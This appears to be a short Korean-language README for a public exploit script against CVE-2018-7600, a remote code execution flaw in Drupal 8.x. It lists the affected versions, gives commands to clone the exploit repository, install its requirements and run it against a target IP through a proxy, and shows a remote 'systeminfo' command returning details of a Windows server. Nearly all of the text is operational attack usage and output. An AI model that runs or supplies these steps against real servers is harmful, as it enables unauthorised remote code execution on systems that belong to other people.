
Drupal 8.3.9 이전의 8.x, 8.4.6 이전의 8.4.x, 8.5.1 이전의 8.5.x 버전은 기본 또는 일반 모듈 구성과 관련된 여러 하위 시스템에 영향을 미치는 문제로 인해 원격 공격자가 임의 코드를 실행할 수 있습니다.
버전 8에서만 작동하며, 7에서는 작동하지 않습니다.
git clone https://github.com/0xAJ2K/CVE-2018-7600.git
pip3 install -r requirements.txt
python3 CVE-2018-7600.py
python3 CVE-2018-7600.py -u http://172.31.1.27
kali :: /opt/myscripts » ./CVE-2018-7600.py -u http://172.31.1.27 -p http://127.0.0.1:8080
CMD: systeminfo
Host Name: Test
OS Name: Microsoft Windows Server 2019 Datacenter
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
<snip>